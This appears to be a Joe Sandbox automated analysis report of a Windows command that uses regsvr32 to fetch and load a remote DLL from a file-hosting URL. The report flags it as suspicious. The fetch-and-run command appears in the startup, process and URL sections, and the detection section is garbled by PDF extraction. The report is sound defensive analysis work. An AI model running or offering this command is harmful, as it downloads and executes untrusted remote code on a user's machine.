ID: 357160 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 08:59:48 Date: 24/02/2021 Version: 31.0.0 Emerald Table of Contents

Table of Contents 2 Analysis Report 3 Overview 3 General Information 3 Detection 3 Signatures 3 Classification 3 Startup 3 Malware Configuration 3 Yara Overview 3 Sigma Overview 3 System Summary: 3 Signature Overview 3 System Summary: 4 Mitre Att&ck Matrix 4 Behavior Graph 4 Screenshots 5 Thumbnails 5 Antivirus, Machine Learning and Genetic Malware Detection 6 Initial Sample 6 Dropped Files 6 Unpacked PE Files 6 Domains 6 URLs 6 Domains and IPs 6 Contacted Domains 7 URLs from Memory and Binaries 7 Contacted IPs 7 General Information 7 Simulations 7 Behavior and APIs 8 Joe Sandbox View / Context 8 IPs 8 Domains 8 ASN 8 JA3 Fingerprints 8 Dropped Files 8 Created / dropped Files 8 Static File Info 8 No static file info 8 Network Behavior 8 Code Manipulations 8 Statistics 8 Behavior 8 System Behavior 9 Analysis Process: cmd.exe PID: 6988 Parent PID: 5036 9 General 9 File Activities 9 Analysis Process: conhost.exe PID: 7008 Parent PID: 6988 9 General 9 Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988 10 General 10 Disassembly 10 Code Analysis 10

Copyright null 2021 Page 2 of 10 Analysis Report

Overview

General Information Detection Signatures Classification

Analysis ID: 357160 SSiiiggmaa ddeettteeccttteedd::: RReeggssvvrrr3322 AAnnoomaalllyy Infos: CSCrirrgeemaatttaee ssd eaat eppcrrrotoeccdee:ss Rss eiiinng ssvuurss3pp2ee nAndndeoedmd maloyo… Most interesting Screenshot: PCPrrroeogagrrtraeams a dd opoereossc nenosotstt ssinhh ooswwu s mpeuuncchdh e aadcc ttmtiiivvoiii…

Ransomware RPRereogggiiisrsattteemrrrss d aao eDDsLL LnLot show much activi Miner Spreading

TRTrreiieegssis ttoeo r llsoo aadd D mLiLissssiinngg DDLLLLss TTrrriiieess tttoo lllooaadd miiissssiiinngg DDLLLLss mmaallliiiccciiioouusss malicious

Evader Phishing

sssuusssppiiiccciiioouusss Tries to load missing DLLs suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Score: 22 Range: 0 - 100 Whitelisted: false Confidence: 80%

Startup

System is w10x64 cmd.exe (PID: 6988 cmdline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) regsvr32.exe (PID: 7056 cmdline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll MD5: 426E7499F6A7346F0410DEAD0805586B) cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly

Signature Overview

Copyright null 2021 Page 3 of 10 • Networking • System Summary • Data Obfuscation • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

System Summary:

Mitre Att&ck Matrix

Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Impact Valid Windows DLL Side- Process Regsvr32 1 OS Security Remote Data from Exfiltration Data Eavesdrop on Remotely Modify Accounts Management Loading 1 Injection 1 1 Credential Software Services Local Over Other Obfuscation Insecure Track Device System Instrumentation Dumping Discovery 1 System Network Network Without Partition Medium Communication Authorization Default Scheduled Boot or DLL Side- Process LSASS System Remote Data from Exfiltration Junk Data Exploit SS7 to Remotely Device Accounts Task/Job Logon Loading 1 Injection 1 1 Memory Information Desktop Removable Over Redirect Phone Wipe Data Lockout Initialization Discovery 1 Protocol Media Bluetooth Calls/SMS Without Scripts Authorization Domain At (Linux) Logon Script Logon Script DLL Side- Security Query SMB/Windows Data from Automated Steganography Exploit SS7 to Obtain Delete Accounts (Windows) (Windows) Loading 1 Account Registry Admin Shares Network Exfiltration Track Device Device Device Manager Shared Location Cloud Data Drive Backups

Behavior Graph

Copyright null 2021 Page 4 of 10 Hide Legend Legend: Process

Behavior Graph Signature Created File ID: 357160 DNS/IP Info Cookbook: defaultwindowscmdlinecookbook.jbs Is Dropped Startdate: 24/02/2021 Architecture: WINDOWS Is Windows Process Score: 22 Number of created Registry Values

Number of created Files

Visual Basic

Sigma detected: Regsvr32 Delphi started Anomaly Java

.Net C# or VB.NET

C, C++ or other language

cmd.exe Is malicious Internet

1

started started

conhost.exe regsvr32.exe

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Copyright null 2021 Page 5 of 10 Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Copyright null 2021 Page 6 of 10 Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation https://tmpfiles.org/dl/161971/k.dllWinsta0 regsvr32.exe, 00000002.0000000 false unknown 2.325527375.00000000027F0000.0 0000004.00000020.sdmp https://tmpfiles.org/dl/161971/k.dll regsvr32.exe, 00000002.0000000 true unknown 2.325634312.0000000002AB0000.0 0000004.00000040.sdmp https://tmpfiles.org/dl/161971/k.dllregsvr32 regsvr32.exe, 00000002.0000000 false unknown 2.325527375.00000000027F0000.0 0000004.00000020.sdmp

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald Analysis ID: 357160 Start date: 24.02.2021 Start time: 08:59:48 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 2m 53s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 4 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: SUS Classification: sus22.win@4/0@0/0 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated Warnings: Show All Exclude process from analysis (whitelisted): svchost.exe

Simulations

Copyright null 2021 Page 7 of 10 Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

Copyright null 2021 Page 8 of 10 • cmd.exe • conhost.exe • regsvr32.exe

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6988 Parent PID: 5036

General

Start time: 09:00:35 Start date: 24/02/2021 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll' Imagebase: 0x2a0000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Analysis Process: conhost.exe PID: 7008 Parent PID: 6988

General

Start time: 09:00:36 Start date: 24/02/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff61de10000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Copyright null 2021 Page 9 of 10 Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988

General

Start time: 09:00:36 Start date: 24/02/2021 Path: C:\Windows\SysWOW64\regsvr32.exe Wow64 process (32bit): true Commandline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll Imagebase: 0x100000 File size: 20992 bytes MD5 hash: 426E7499F6A7346F0410DEAD0805586B Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Disassembly

Code Analysis

Copyright null 2021 Page 10 of 10